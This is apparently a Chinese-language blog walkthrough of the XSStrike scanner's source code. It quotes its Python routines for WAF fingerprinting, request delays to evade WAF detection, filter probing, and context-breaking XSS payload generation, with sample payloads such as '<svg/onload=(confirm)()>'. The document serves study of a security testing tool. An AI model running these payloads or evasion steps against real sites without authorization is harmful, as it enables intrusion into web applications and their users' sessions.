XSStrike 源码阅读

XSStrike

XSStrike是一款XSS扫描工具。

Github地址: https://github.com/UltimateHackers/XSStrike

官网: https://xsstrike.tk/

特点如下

WAF识别与绕过
自动POC生成
支持GET与POST请求
支持Cookie/HTTP认证
隐藏参数发现
Blind XSS 爆破

接下来也主要基于以上特点进行源码分析。

源码分析

程序初始化

在导入相关package后，XSStrike进行了一系列的设置初始化工作。按顺序梳理如下:

定义颜色参数:

1
2
3

# Just some colors and shit
white = '\033[1;97m'
...

初始化浏览器对象br，并设置相关参数:

br = mechanize.Browser() # Just shortening the calling function
br.set_handle_robots(False) # Don't follow robots.txt
br.set_handle_equiv(True) # I don't know what it does, but its some good shit
br.set_handle_redirect(True) # Follow redirects
br.set_handle_referer(True) # Include referrer
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'),
('Accept-Encoding', 'deflate'), ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q

主要的几个参数:

set_handle_robots = False，即不跟随robots.txt
set_handle_equiv = True，作者也不知道为啥这样设置:)笑
set_handle_redirect = True，跟随跳转
set_handle_referer = True，在每次请求中添加Reffer头

接下来的部分初始化了一些变量和函数，如下：

1
2
3

xsschecker = 'd3v' # A non malicious string to check for reflections and stuff
paranames = [] # list for storing parameter names
paravalues = [] # list for storing parameter values

xsschecker被设定为d3v，用于做xss的检测。这个d3v是无害的，因此可以利用其来检测页面的输出点。之所以不使用payload，是因为有可能waf会直接过滤掉payload中的敏感关键字，使得检测失效，因此一般在xss扫描器中，会先使用无害的字符串来验证，之后再逐步调整payload。paranames和paravalues分别用来存放参数名和参数值。

CURRENTLY_OPEN_TAGS = [] # Used by HTML parser
OPEN_EMPTY_TAG = "" # to store context i.e. <input attr=$reflection> then input will be open tag
blacklist = ['html','body','br'] # These tags are normally empty thats why we are ignoring them
whitelist = ['input', 'textarea'] # These tags are the top priority to break out from        
NUM_REFLECTIONS = 0 # Number of reflections
OCCURENCE_NUM = 0 # Occurence number
OCCURENCE_PARSED = 0 # Occurence parsed by the parser
occur_number = []
occur_location = []
delay = 0

因为在很多页面中html/body/br标签都不闭合，因此直接添加进了黑名单，而input/textarea作为输入和输出点很有可能出现xss因此予以优先考虑，添加进入whitelist

tags = ['sVg', 'iMg', 'bOdY', 'd3v', 'deTails'] # HTML Tags
event_handlers = { # Event handlers and the name of tags which can be used with them
'oNeRror': ['sVg', 'iMg', 'viDeo'],
省略
}
functions = [ # JavaScript functions to get a popup
'[8].find(confirm)', 省略]
# "Not so malicious" payloads for fuzzing
fuzzes = ['<z oNxXx=yyy>', 省略]
payloads = [ # Payloads for blind xss and simple bruteforcing
'\'"</Script><Html Onmouseover=(confirm)()//'
省略]
blind_params = ['redirect',省略]

这里定义了后续fuzz/scan过程中用到的payload。

接着XSStrike进行update检查，随后程序流程来到第781行input()，真正的扫描工作从这里开始。

input() - 扫描入口点

input()是扫描的起始点，设定扫描目标及参数。源码如下:

def input():
    target = raw_input('%s Enter a url: ' % que)
    if 'http' in target: # if the target has http in it, do nothing
        pass
    else:
        try:
            br.open('http://%s' % target) # Makes request to the target with http schema
            target = 'http://%s' % target
        except: # if it fails, maybe the target uses https schema
            target = 'https://%s' % target
    try:
        br.open(target) # Makes request to the target
    except Exception as e: # if it fails, the target is unreachable
        if 'ssl' in str(e).lower():
            print '%s Unable to verify target\'s SSL certificate.' % bad
            quit()
        else:
            print '%s Unable to connect to the target.' % bad
            quit()

接受URL地址，检测是否有URL地址中是否有协议，并对相应的URL进行连接测试。

1
2
3

cookie = raw_input('%s Enter cookie (if any): ' % que)
 if cookie != '':
     br.addheaders.append(('Cookie', cookie))

接着接受输入cookie，作为后续扫描的身份认证。

if '=' in target: # A url with GET request must have a = so...
    GET, POST = True, False
    param_data = ''
    param_parser(target, param_data, GET, POST)
    initiator(url, GET, POST)
else:
    choice = raw_input('%s Does it use POST method? [Y/n] ' % que).lower()
    if choice == 'n':
        GET, POST = True, False
        initiator(target, GET, POST)
    else:
        GET, POST = False, True
        param_data = raw_input('%s Enter POST data: ' % que)
        param_parser(target, param_data, GET, POST)
        initiator(url, GET, POST)

接着input()从给定的URL中解析出相应的参数。如果URL中包含查询参数，也即包含=，说明为GET请求，否则进行询问，并手动输入对应的参数名与参数值，并根据请求方式调用param_parser(target, param_data, GET, POST)设置相应的参数。param_parser()定义在第626行，源码如下。param_parser()将对应的参数名和值分别添加入前面定义的paranames和paravalues中。

def param_parser(target, param_data, GET, POST):
    global url
    if POST:
        target = target + '?' + param_data
    parsed_url = urlparse(target)
    url = parsed_url.scheme+'://'+parsed_url.netloc+parsed_url.path
    parameters = parse_qs(parsed_url.query, keep_blank_values=True)
    for para in parameters:
        for i in parameters[para]:
            paranames.append(para)
            paravalues.append(i)

最后input()调用initiator()进行扫描。

initiator() - xss 扫描

initiator()定义在第642行。代码大体框架如下:

def initiator(url, GET, POST):
    choice = raw_input('%s Would you like to look for hidden parameters? [y/N] ' % que)
    if choice == 'y':
        paramfinder(url, GET, POST)
    if len(paranames) == 0:
        print '%s No parameters to test.' % bad
        quit()
    else:
         if GET: ...
         elif POST: ...
    
    if len(occur_number) == 0 and GET: ...
    elif len(occur_number) == 0 and POST: ...

第一步

先询问是否要查询隐藏参数，是的话则调用paramfinder(url, GET, POST)。关于paramfinder()的解析见paramfinder() - 查找隐藏参数 - 查找隐藏参数)。

第二步

确认paranames长度不为零后，根据请求方法的不同进行初步不同方式的扫描。此处GET和POST的请求的处理流程类似，可以归结为如下代码:

if GET:
    GET, POST = True, False
    WAF_detector(url, '?'+paranames[0]+'='+xsschecker, GET, POST)
    current_param = 0
    for param_name in paranames:
        print ('%s-%s' % (red, end)) * 50
        print '%s Testing parameter %s%s%s' % (run, green, param_name, end)
        
        paranames_combined = []
        for param_name, param_value in izip(paranames, paravalues):
            paranames_combined.append('&' + param_name + '=' + param_value)
        
        new_param_data = []
        current = '&' + paranames[current_param] + '='
        for i in paranames_combined:
            if current in i:
                pass
            else:
                new_param_data.append(i)
        
        param_data = '?' + paranames[current_param] + '=' + xsschecker + ''.join(new_param_data) # GET
        param_data = paranames[current_param] + '=' + xsschecker + ''.join(new_param_data) # POST
        if WAF:
            choice = raw_input('%s A WAF is active on the target. Would you like to delay requests to evade suspicion? [y/N] ' % que)
            if choice == 'y':
                delay = 6
            else:
                delay = 0
            fuzzer(url, param_data, GET, POST) #Launches fuzzer aka Ninja
            quit()
        filter_checker(url, param_data, GET, POST) # Launches filter checker
        locater(url, param_data, GET, POST) # Launches locater
        inject(url, param_data, GET, POST) # Launches injector
        del occur_number[:]
        del occur_location[:]
        current_param = current_param + 1

这个流程中，先用paranames[0]通过WAF_detector()检测是否有WAF存在，对函数WAF_detector()的解析见后。之后根据paranames中的参数，选择当前测试的参数paranames[current_param]，对其余param_data中的参数则保留并存放于new_param_data中。，根据GET或POST方式生成对应的param_data。

比如url为：http://127.0.0.1/?input_r=f&input_d=e 。这里有两个参数input_r和input_d。当测试input_d时，其值为xsschecker即d3v。而new_param_data为&input_r=f。最后生成的初始测试参数param_data即为?input_d=d3v&input_r=f

根据前面的检测WAF是否存在，程序会进行不同的分支。

有WAF情况

对应源码第671行即：

if WAF:
    choice = raw_input('%s A WAF is active on the target. Would you like to delay requests to evade     ? [y/N] ' % que)
    if choice == 'y':
        delay = 6
    else:
        delay = 0
    fuzzer(url, param_data, GET, POST) #Launches fuzzer aka Ninja
    quit()

由于检测到了WAF，因此询问是否减缓请求速度来防止被办。然后调用fuzzer()进行xss payload的fuzz。关于fuzzer()部分见后。

无WAF情况

源码第681行：

filter_checker(url, param_data, GET, POST) # Launces filter checker
locater(url, param_data, GET, POST) # Launcher locater
inject(url, param_data, GET, POST) # Launches injector
del occur_number[:]
del occur_location[:]
current_param = current_param + 1

先调用filter_checker(url, param_data, GET, POST)进行基本的过滤检查，其中如果检查的字符串直接能触发xss则可以直接退出，否则进行进一步检查，对filter_checker()的分析见后。

接着调用locater(url, param_data, GET, POST)根据参数，对页面中所有可能的输出点进行一一定位，并将结果保存在occur_number和occur_location中。关于locater()的分析见后

最后调用inject(url, param_data, GET, POST)真正进行地xss扫描/fuzz工作。关于inject()的分析见后。

结束对当前参数的检测后，清理occur_number和occur_location，用于存放下一个参数出现的ID和位置。current_param = current_param + 1，程序进入对下一个参数的检测。

第三步

完成第二步的自动话检测后，这一步是手动检测，通过自动填充payaload，打开浏览器，进行人工确认:

if len(occur_number) == 0 and GET:
    print '%s Executing project HULK for blind XSS Detection' % info
    for payload in payloads:
        param_data = param_data.replace(xsschecker, payload) # Replaces the xsschecker with payload
        print '%s Payload: %s' % (info, payload)
        webbrowser.open(url + param_data) # Opens the "injected" URL in browser
        next = raw_input('%s Press enter to execute next payload' % que)
elif len(occur_number) == 0 and POST:
    choice = raw_input('%s Would you like to generate some payloads for blind XSS? [Y/n] ' % que).lower()
    if choice == 'n':
        quit()
    else:
        for payload in payloads: # We will print the payloads from the payloads list
            print '%s  %s' % (info, payload)

paramfinder() - 查找隐藏参数

paramfinder()定义在第439行，源码如下：

def paramfinder(url, GET, POST):
    response = br.open(url).read()
    matches = re.findall(r'<input[^<]*name=\'[^<]*\'*>|<input[^<]*name="[^<]*"*>', response)
    for match in matches: ...
    progress = 0
    for param in blind_params:
        progress = progress + 1
        sys.stdout.write('\r%s Parameters checked: %i/%i' % (run, progress, len(blind_params)))
        sys.stdout.flush()
        if param not in paranames:
            if GET:
                response = br.open(url + '?' + param + '=' + xsschecker).read()
            if POST:
                response = br.open(url, param + '=' + xsschecker).read()
            if '\'%s\'' % xsschecker in response or '"%s"' % xsschecker in response or ' %s ' % xsschecker in response:
                print '%s Valid parameter found : %s%s%s' % (good, green, param, end)
                paranames.append(param)
                paravalues.append('')

paramfinder()先请求URL，获得HTML页面后，根据正则表达式提取出所有可能的输入点，并将其添加进blind_params。

之后根据请求方法GET还是POST，构造相应的请求。在这两种请求中，参数名为从html页面提取的可能的参数，而参数值则为一开始即初始化过的xsschecker。

接着paramfinder()根据返回页面中是否包含xsschecker的值来确定是否存在隐藏参数，并将其添加进入paranames和paravalues中，作为进一步扫描的对象。

WAF_detector() - WAF检测

WAF_detector() 定义在第171行，它通过发起请求，然后根据页面的response code来确定是否存在waf。源码如下：

def WAF_detector(url, param_data, GET, POST):
    global WAF
    WAF = False
    noise = quote_plus('<script>confirm()</script>') #a payload which is noisy enough to provoke the WAF
    fuzz = param_data.replace(xsschecker, noise) #Replaces xsschecker in param_data with noise
    try:
        sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        if GET:
            response = br.open(url + fuzz) # Opens the noise injected payload
        else:
            response = br.open(url, fuzz) # Opens the noise injected payload
        print '%s WAF Status: Offline' % good
    except Exception as e: # if an error occurs, catch the error
        e = str(e) # convert the error to a string
        # Here, we are looking for HTTP response codes in the error to fingerprint the WAF
        if '406' in e or '501' in e: # if the http response code is 406/501
            WAF_Name = 'Mod_Security'
            WAF = True
        elif '999' in e: # if the http response code is 999
            WAF_Name = 'WebKnight'
            WAF = True
        elif '419' in e: # if the http response code is 419
            WAF_Name = 'F5 BIG IP'
            WAF = True
        elif '403' in e: # if the http response code is 403
            WAF_Name = 'Unknown'
            WAF = True
        else:
            print '%s WAF Status: Offline' % good
        if WAF:
            print '%s WAF Detected: %s' % (bad, WAF_Name)

该函数在第652行，initiator()中调用：WAF_detector(url, '?'+paranames[0]+'='+xsschecker, GET, POST)。

该函数将无害的xsschecker替换为最常见的payload<script>confirm()</script>，因此当存在waf时，基本能触发waf，从而检测得到。之后根据下表进行了对waf的指纹检索：

status_code	WAF name
406或501	Mod_Security
999	WebKnight
419	F5 BIG IP
403	Unknown

fuzzer() - 对WAF的fuzz

fuzzer()定义在 134 行，源码如下:

def fuzzer(url, param_data, GET, POST):
    result = [] # Result of fuzzing
    progress = 0 # Variable for recording the progress of fuzzing
    for i in fuzzes:
        progress = progress + 1
        sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec. # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        sys.stdout.write('\r%s Fuzz Sent: %i/%i' % (run, progress, len(fuzzes)))
        sys.stdout.flush()
        try:
            fuzzy = quote_plus(i) # URL encoding the payload
            param_data_injected = param_data.replace(xsschecker, fuzzy) # Replcaing the xsschecker with fuzz
            if GET: # GET parameter
                response = br.open(url + param_data_injected).read() # makes a request to example.com/search.php?q=<fuzz>
            else: # POST parameter
                response = br.open(url, param_data_injected).read() # Seperating the "param_data_injected" with comma because its POST data
            if i in response: # if fuzz string is reflected in the response / source code
                result.append({
                'result' : '%sWorks%s' % (green, end),
                'fuzz' : i})
            else: # if the fuzz string was not reflected in the response completely
                result.append({
                    'result' : '%sFiltered%s' % (yellow, end),
                    'fuzz' : i})
        except: # if the server returned an error (Maybe WAF blocked it)
            result.append({
                'result' : '%sBlocked%s'  % (red, end),
                'fuzz' : i})
    table = PrettyTable(['Fuzz', 'Response']) # Creates a table with two columns
    for value in result:
        table.add_row([value['fuzz'], value['result']]) # Adds the value of fuzz and result to the columns
    print '\n', table

fuzzes在程序初始化部分已经定义fuzzes = ['<z oNxXx=yyy>', '<z xXx=yyy>'.......]。fuzzer中遍历fuzzes，通过对当前测试参数替换不同的payload，观察返回的html页面，若payload在页面中被匹配到则为Works，否则即失败Filtered或Blocked。之后用PrettyTable输出fuzz的结果。

filter_checker() - 过滤检查

filter_checker()定义在 207 行：

def filter_checker(url, param_data, GET, POST):
    strength = '' # A variable for containing strength of the filter
    # Injecting a malicious payload first by replacing xsschecker with our payload
    try:
        low_string = param_data.replace(xsschecker, quote_plus('<svg/onload=(confirm)()>'))
        sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        if GET:
            low_request = br.open(url + low_string).read()
        else:
            low_request = br.open(url, low_string).read()
        if '<svg/onload=(confirm)()>' in low_request: ...
        else: ...
    except Exception as e:
        try:
            print '%s Target doesn\'t seem to respond properly. Error Code: %s' % (bad, re.search(r'\d\d\d', str(e)).group())
        except:
            print '%s Target doesn\'t seem to respond properly.' % bad

这里直接使用<svg/onload=(confirm)()>来进行过滤检查。变量strength用于表明过滤的强度。之后根据页面返回的html进行深入检查。

如果没有过滤，也即返回的html中直接包含了<svg/onload=(confirm)()>，则直接确定过滤强度为Low or None。并且<svg/onload=(confirm)()>即可作为payload，根据选择是要进一步的处理，还是直接根据这个payload打开相应的xss页面。下面是对应的代码。

if '<svg/onload=(confirm)()>' in low_request: # If payload was reflected in response
    print "%s Filter Strength : %sLow or None%s" % (good, green, end)
    print '%s Payload: <svg/onload=(confirm)()>' % good
    print '%s Efficiency: 100%%' % good
    choice = raw_input('%s A payload with 100%% efficiency was found. Continue scanning? [y/N] ' % que).lower()
    if choice == 'y':
        pass
    else:
        if GET:
            webbrowser.open(url+param_data.strip(xsschecker)+'<svg/onload=(confirm)()>')
            quit()
    strength = 'low' # As a malicious payload was not filtered, the filter is weak

倘若存在过滤，也即返回的页面中找不到<svg/onload=(confirm)()>，可能直接整个去掉了，可能过滤了某些关键字，或者可能转义了敏感字符。则会更换测试的payload，比如<zz//onxx=yy>，然后发起请。根据响应html，如果<zz//onxx=yy>在html中，则过滤程度为medium，如果不在html，则过滤程度为high。相关代码如下：

else: # If malicious payload was filtered (was not in the response)
    # Now we will use a less malicious payload
    medium_string = param_data.replace(xsschecker, quote_plus('<zz//onxx=yy>'))
    sleep(delay) # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
    if GET:
        medium_request = br.open(url + medium_string).read()
    else:
        medium_request = br.open(url + medium_string).read()
    if '<zz onxx=yy>' in medium_request:
        print '%s Filter Strength : %sMedium%s' % (info, yellow, end)
        strength = 'medium'
    else: #Printing high since result was not medium/low
        print '%s Filter Strength : %sHigh%s' % (bad, red, end)
        strength = 'high'
    return strength

locater() - 定位输出点

locater() 定义在第 254 行：

def locater(url, param_data, GET, POST):
    init_resp = make_request(url, param_data, GET, POST) # Makes request to the target
    if(xsschecker in init_resp.lower()): # if the xsschecker is found in the response
        global NUM_REFLECTIONS # The number of reflections of xsschecker in the response
        NUM_REFLECTIONS = init_resp.lower().count(xsschecker.lower()) # Counts number of time d3v got reflected in webpage
        print '%s Number of reflections found: %i' % (info, NUM_REFLECTIONS)
        for i in range(NUM_REFLECTIONS):
            global OCCURENCE_NUM
            OCCURENCE_NUM = i+1
            scan_occurence(init_resp) # Calls out a function to find context/location of xsschecker 
            # Reset globals for next instance
            global ALLOWED_CHARS, IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG, CURRENTLY_OPEN_TAGS, OPEN_TAGS, OCCURENCE_PARSED, OPEN_EMPTY_TAG
            ALLOWED_CHARS, CURRENTLY_OPEN_TAGS, OPEN_TAGS = [], [], []
            IN_SINGLE_QUOTES, IN_DOUBLE_QUOTES, IN_TAG_ATTRIBUTE, IN_TAG_NON_ATTRIBUTE, IN_SCRIPT_TAG = False, False, False, False, False
            OCCURENCE_PARSED = 0
            OPEN_EMPTY_TAG = ""
    else: #Launched hulk if no reflection is found. Hulk Smash!
        print '%s No reflection found.' % bad

这里定位输出点，通过xsschecker的值为d3v，可以检测在html中该值出现了几次，保存为NUM_REFLECTIONS。同时用变量OCCURENCE_NUM来定位每次的输出点，然后通过对每一处进行scan_occurence()，该函数定义在 273 行，代码如下：

def scan_occurence(init_resp):
    # Parses the response to locate the position/context of xsschecker i.e. d3v
    location = html_parse(init_resp) # Calling out the parser function
    if location in ('script', 'html_data', 'start_end_tag_attr', 'attr'):
        occur_number.append(OCCURENCE_NUM)
        occur_location.append(location)
    # We are treating the comment context differentally because if a payload is reflected
    # in comment, it won't execute. So will we test the comment context first
    elif location == 'comment':
        occur_number.insert(0, OCCURENCE_NUM) # inserting the occurence_num in start of the list
        occur_location.insert(0, location) # same as above
    else:
        pass

html_parse(init_resp)是作者自己实现的html解析函数，通过OCCURENCE_NUM可以定位到具体的输出点，然后确定输出点所在的位置。作者在注释中提到，如果输出点在注释中，则直接成为occur_number和occur_location的首元素，因为通常情况下处于注释中的代码时不会执行的。在其他情况下（script/html_data/start_end_tag_attr/attr），按顺序对应添加进入occur_number和occur_location。occur_number是输出点的标号，occur_location是输出点的位置。

inject() - payload注入

inject() 定义在第 468 行，这部分是进行xss攻击的核心部分，代码较长，整体的框架如下：

def inject(url, param_data, GET, POST):
    special = ''
    l_filling = ''
    e_fillings = ['%0a','%09','%0d','+'] # "Things" to use between event handler and = or between function and =
    fillings = ['%0c', '%0a','%09','%0d','/+/'] # "Things" to use instead of space
    
    for OCCURENCE_NUM, location in izip(occur_number, occur_location):
        print '\n%s Testing reflection no. %s ' % (run, OCCURENCE_NUM)
        allowed = []
        if test_param_check('k"k', 'k"k', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'): 
            ...
        elif test_param_check('k"k', 'k&quot;k', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'):
            ...
        else:
            ...
        if test_param_check('k\'k', 'k\'k', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'):
            ...
        else:
            ...
        if test_param_check('<lol>', '<lol>', OCCURENCE_NUM, url, param_data, GET, POST, action='nope'):
            ...
        else:
            ... 
        if location == 'comment':
            ...
        elif location == 'script':
            ...
        elif location == 'html_data':
            ...
        elif location == 'start_end_tag_attr' or location == 'attr':
            ...

首先会先定义四个变量special、l_filling、e_fillings、fillings，这些保存着后续payload生成的一些关键字符。接着通过对occur_number,occur_location的遍历，对每一个测试点进行测试。

测试主要分为两部分。

在第一部分的测试中，主要通过test_param_check()来进行特殊字符的检测，查看是否进行了编码：

双引号(')
单引号(")
尖括号(<>)
关于test_param_check()如何具体工作，见后文

在第二部分的测试中，根据当前测试点所在位置的不同进行不同的测试。

当输出点在注释（comment）中时：

if location == 'comment':
    print '%s Trying to break out of %sHTML Comment%s context.' % (run, green, end)
    prefix = '-->'
    suffixes = ['', '<!--']
    progress = 1
    for suffix in suffixes:
        for tag in tags:
            for event_handler, compatible in event_handlers.items():
                if tag in compatible:
                    for filling, function, e_filling in izip(fillings, functions, e_fillings):
                        progress = progress + 1
                        sys.stdout.write('\r%s Payloads tried: %i' % (run, progress))
                        sys.stdout.flush()
                        if event_handler == 'oNeRror':
                            payload = '%s<%s%s%s%s%s%s%s%s=%s%s%s>%s' % (prefix, tag, filling, 'sRc=', e_filling, '=', e_filling, event_handler, e_filling, e_filling, function, l_filling, suffix)
                        else:
                            payload = '%s<%s%s%s%s%s=%s%s%s>%s' % (prefix, tag, filling, special, event_handler, e_filling, e_filling, function, l_filling, suffix)
                        test_param_check(quote_plus(payload), payload, OCCURENCE_NUM, url, param_data, GET, POST, action='do')

为了闭合注释，则payload的前缀必然是-->，而对于后缀可以是空，或者选择闭合<!--。接着选取前面定义的各种payload组成元素，构成payload，进行test_param_check()测试

当输出点在script标签中时，同样确定了可能的前缀和后缀，然后在生成payload，最后进行test_param_check()测试

当输出点在html_data中时，比如<h1>输出点</h1>为了能让js解析payload而不仅仅只是文本，通常需要有尖括号，比如<h1><script>alert(1)</h1>、<h1><svg/onload=(confirm)()><h1>，因此当检测到尖括号被过滤掉时，会直接跳过此次测试:

if angular_allowed:
    l_than, g_than = '<', '>'
# elif entity_allowed:
#     l_than, g_than = '&lt;', '&gt;'
else:
    print '%s Angular brackets are being filtered. Unable to generate payloads.' % bad
    continue

倘若没有过滤，则生成payload，并进行test_param_check()测试。

当输出点在属性中时，比如<img src=输出点>或者<img src="输出点">或者<img src='输出点'>，首先要考虑的时引号的闭合问题，因此会先提取出需要闭合的是单引号还是双引号还是不需要引号，然后生成payload进行test_param_check()测试:

elif location == 'start_end_tag_attr' or location == 'attr':
    print '%s Trying to break out of %sAttribute%s context.' % (run, green, end)
    quote = which_quote(OCCURENCE_NUM, url, param_data, GET, POST)
    
    if quote == '':
        prefix = '/>'
        suffixes = ['<"', '<\'', '<br attr\'=', '<br attr="']
    elif quote in allowed:
        允许引号，生成payload，进行测试。
    elif quote not in allowed and 'entity' in allowed:
        注 此部分被作者注释掉。暂且跳过不分析。
    else:
        print '%s Quotes are being filtered, its not possible to break out of the context.' % bad

html_parse() - html解析

html_parse()定义在第 287 行：

def html_parse(init_resp):
    parser = MyHTMLParser() # initializes the parser
    location = '' # Variable for containing the location lol
    try:
        parser.feed(init_resp) # submitting the response to the parser
    except Exception as e: # Catching the exception/error
        location = str(e) # The error is actually the location. For more info, check MyHTMLParser class
    return location # Returns the location

而MyHTMLParser()是作者实现的类，继承自HTMLParser，定义在第 360 行：

class MyHTMLParser(HTMLParser):
    def handle_comment(self, data):
        global OCCURENCE_PARSED
        if(xsschecker.lower() in data.lower()):
            OCCURENCE_PARSED += 1
            if(OCCURENCE_PARSED == OCCURENCE_NUM):
                raise Exception("comment")
    def handle_startendtag(self, tag, attrs):
        ...
    def handle_starttag(self, tag, attrs):
        ...
    def handle_endtag(self, tag):       
        ...
    def handle_data(self, data):
        ...

以handle_comment为例，当当前处理的OCCURENCE_PARSED与OCCURENCE_NUM相等时，说明此时MyHTMLParser()解析到此时检查的输出点处，根据情况不同raise异常，比如raise Exception("comment")。

然后html_parse()中，通过捕获异常location = str(e)来获得输出点的位置。

在html解析中，输出点主要分为以下几类：

comment
script
attr
html_data
start_end_tag_attr

test_param_check() - 检查返回值

test_param_check()定义在 296 行，用于在注入特殊字符串（包括比如引号测试，payload测试）后，根据页面返回信息来确定是否xss成功。

def test_param_check(payload_to_check, payload_to_compare, OCCURENCE_NUM, url, param_data, GET, POST, action):
    check_string = 'XSSSTART' + payload_to_check + 'XSSEND' # We are adding XSSSTART and XSSEND to make
    compare_string = 'XSSSTART' + payload_to_compare + 'XSSEND' # the payload distinguishable in the response
    param_data_injected = param_data.replace(xsschecker, check_string)
    try:
        check_response = make_request(url, param_data_injected, GET, POST)
    except:
        check_response = ''
    success = False
    occurence_counter = 0 # Variable to keep track of which reflection is going through the loop
    # Itretating over the reflections
    for m in re.finditer('XSSSTART', check_response, re.IGNORECASE):
        occurence_counter = occurence_counter + 1
        efficiency = fuzz.partial_ratio(check_response[m.start():m.start()+len(compare_string)].lower(), compare_string.lower())
        if efficiency == 100:
            if action == 'do':
                ...
            if occurence_counter == OCCURENCE_NUM:
                success = True
            break
        
        if efficiency > 90:
            if action == 'do':
                ...
    return success

check_string是发送的payload，由于要在网络中传输，因此一般会经过url编码。compare_string是页面返回html中期望看到的payload本身。这两个变量头尾都加上了XSSSTART和XSSEND，这是为了后续定位检测的方便。

在定位到输出点后，使用了fuzz.partial_ratio()来计算字符串的相似度，来测试xss是否成功过。

根据官网的信息，里面是这么描述XSStrike的：

But is XSS about copy pasting payloads? No. That's why XSStrike uses context breaking technique to automatically generate payloads and then uses levensthian algorithm to look for the payload in the web page to avoid false positives/negatives.

所以levensthian algorithm即为partial_ratio()。。

总结

XSStrike的运行流程归结如下：

程序初始化
input() 程序入口
1. param_parser() 参数解析
2. initiator() xss扫描
  1. paramfinder() 查询隐藏参数
  2. GET/POST
    1. WAF_detector() WAF检测
    2. 有无WAF
      1. 有
        
        fuzzer()
      2. 无
        
        filter_checker()
        
        locater()
        
        scan_occurence()
        
        inject()
        
        test_param_check() 特殊字符检测
        
        test_param_check() payload注入检测1
        
        手动检测